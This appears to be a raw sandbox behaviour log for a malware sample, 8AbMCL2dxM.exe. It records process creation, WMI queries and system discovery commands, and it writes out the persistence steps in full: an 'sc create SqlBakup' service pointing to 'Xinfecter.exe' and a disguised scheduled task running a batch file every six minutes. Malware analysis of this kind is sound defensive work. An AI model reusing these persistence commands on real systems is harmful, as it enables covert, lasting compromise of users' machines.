        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1528"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1560"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1640"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1648"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1784"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1872"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1900"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1980"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1988"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2000"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1704"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2076"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2088"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2148"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2236"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2288"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2412"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2424"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2516"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2560"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2600"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2648"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2692"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2764"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2916"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3008"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3624"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3668"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3808"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3952"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4168"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4356"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4400"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4804"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5416"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6016"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5188"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5428"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1888"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5312"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6296"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2260"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2752"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5988"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5796"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2436"::GetOwner
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="516"::GetOwner
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = '8ABMCL2DXM.EXE'
        Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 8AbMCL2dxM.exeReversingLabs: Detection: 76%
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile read: C:\Users\user\Desktop\8AbMCL2dxM.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\8AbMCL2dxM.exe "C:\Users\user\Desktop\8AbMCL2dxM.exe"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: cryptsp.dllJump to behavior
